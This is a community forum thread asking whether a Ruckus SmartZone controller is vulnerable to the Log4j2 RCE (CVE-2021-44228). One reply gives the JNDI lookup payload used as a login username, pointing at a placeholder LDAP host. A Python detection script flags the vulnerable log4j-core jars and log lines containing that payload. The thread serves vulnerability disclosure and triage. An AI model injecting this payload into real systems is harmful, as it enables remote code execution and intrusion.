
[CVE-2021-44228] Apache Log4j2 RCE

dawoon_lee
New Contributor II

Hello.

Our customer is running a Ruckus SmartZone (sz-100) controller.
The version of the controller is 5.1.1.0.598.


The customer asked whether the SmartZone has the following security vulnerability.

** Vulnerability: [CVE-2021-44228] Apache Log4j2 RCE

Thank you for your valuable answers to the above questions.

91 REPLIES

I tested this myself on the weekend. Our virtual smartzone is affected.

Logging in to the Admin page by using a username:

${jndi:ldap://a.b.c.d:6666/a}

(replace a.b.c.d with an IP that is reachable by the controller)

will send out a request to this IP, a request for possible malware. I shut down my controller on the weekend.

Filesystem content of VSZ Image:

./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.13.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.6.1.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.6.6.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.17.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-slf4j-impl-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-jcl-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-web-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-api-2.11.1.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-to-slf4j-2.11.1.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-core-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-core-2.11.1.jar
./opt/ruckuswireless/wsg/apps/lib/slf4j-log4j12-1.7.5.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.7.25.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.16.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-api-2.8.2.jar

...
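As an added example (not code from this thread, from Ruckus, or from the poster): a small Python script that takes a jar listing like the one above and reports which entries are the component that actually carries CVE-2021-44228, plus a check of login/audit lines for the `${jndi:` lookup string quoted earlier. It assumes the usual `artifact-version.jar` filename convention, uses the listing from the post as constructed input, and the log lines are a constructed generic `key=value` form, not a real SmartZone log format. A flagged `log4j-core` 2.x jar below 2.15.0 means the vulnerable library is on disk; whether an input path reaches it is a separate question (the username test in the post answers that for this controller).

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: the jar listing posted in the thread above,
# reproduced here so the script runs offline.
SAMPLE_LISTING = """\
./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.13.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.6.1.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.6.6.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.17.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-slf4j-impl-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-jcl-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-web-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-api-2.11.1.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-to-slf4j-2.11.1.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-core-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-core-2.11.1.jar
./opt/ruckuswireless/wsg/apps/lib/slf4j-log4j12-1.7.5.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.7.25.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.16.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-api-2.8.2.jar
"""

# Constructed sample log lines in a generic key=value form (NOT a real
# SmartZone format). Line index 1 carries the lookup string quoted in the thread.
SAMPLE_LOG_LINES = [
    'login user="admin" src=10.0.0.5 result=success',
    'login user="${jndi:ldap://203.0.113.9:6666/a}" src=198.51.100.7 result=failure',
    'login user="operator" src=10.0.0.8 result=success',
]

# artifact-version.jar: the artifact is everything before the last "-<digit...>" run
JAR_RE = re.compile(r"^(?P<artifact>.+?)-(?P<version>\d[\w.\-]*?)\.jar$")

# Plain and case-varied "${...jndi" forms only; nested-lookup obfuscations
# such as "${${lower:j}ndi:" are not caught by this simple pattern.
JNDI_RE = re.compile(r"\$\{[^}]*jndi", re.IGNORECASE)

# CVE-2021-44228 was fixed in log4j-core 2.15.0; the follow-up advisories
# (CVE-2021-45046, CVE-2021-45105) raised the recommended floor further.
FIXED_IN = (2, 15, 0)


@dataclass
class Finding:
    path: str
    artifact: str
    version: str
    status: str


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.11.1' -> (2, 11, 1); '2.0-beta9' -> (2, 0). Pre-release tags are dropped,
    so 2.0 betas earlier than beta9 would be over-reported as vulnerable."""
    return tuple(int(x) for x in re.findall(r"\d+", version.split("-")[0]))


def classify_jar(path: str) -> Optional[Finding]:
    """Classify one jar path; returns None for jars unrelated to log4j."""
    name = path.rsplit("/", 1)[-1]
    m = JAR_RE.match(name)
    if not m:
        return None
    artifact, version = m.group("artifact"), m.group("version")
    if artifact == "log4j-core":
        # The JNDI lookup class ships in log4j-core; 2.x below 2.15.0 is affected.
        v = parse_version(version)
        status = "VULNERABLE" if (2,) <= v < FIXED_IN else "fixed"
    elif artifact == "log4j" and version.startswith("1."):
        status = "log4j-1.x (not affected by CVE-2021-44228; end-of-life, other advisories apply)"
    elif "log4j" in artifact:
        status = "bridge/adapter (lookup code lives in log4j-core, not here)"
    else:
        return None
    return Finding(path, artifact, version, status)


def inventory(listing: str) -> List[Finding]:
    """Classify every non-empty line of a jar listing."""
    findings = []
    for line in listing.splitlines():
        line = line.strip()
        if line:
            f = classify_jar(line)
            if f:
                findings.append(f)
    return findings


def vulnerable_jars(listing: str) -> List[str]:
    """Paths of jars that carry the CVE-2021-44228 lookup code."""
    return [f.path for f in inventory(listing) if f.status == "VULNERABLE"]


def suspicious_lines(lines: List[str]) -> List[int]:
    """Indexes of log lines containing a JNDI lookup string."""
    return [i for i, line in enumerate(lines) if JNDI_RE.search(line)]


if __name__ == "__main__":
    for f in inventory(SAMPLE_LISTING):
        print(f"{f.status:12s} {f.artifact}-{f.version}")
    for i in suspicious_lines(SAMPLE_LOG_LINES):
        print(f"lookup string in log line {i}: {SAMPLE_LOG_LINES[i]}")
```

Run against the listing from the post, the two `log4j-core` jars (2.8.2 and 2.11.1) come out as the affected entries; the 1.x jars and the slf4j bridges are reported separately so they are not mistaken for the JNDI-bearing component. The log check is only a first-pass indicator for login and web access logs; a reachable vulnerable jar should be treated as exploitable until the vendor fix is applied regardless of whether a probe string has been seen.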

@torge_szczepanek 

Does the above also affect smartzone? (not virtual)

My guess would be that this is the same software, just as an appliance. But this is just a guess. We do not have SmartZone devices.

@torge_szczepanek - good spot!

Br,

Mark.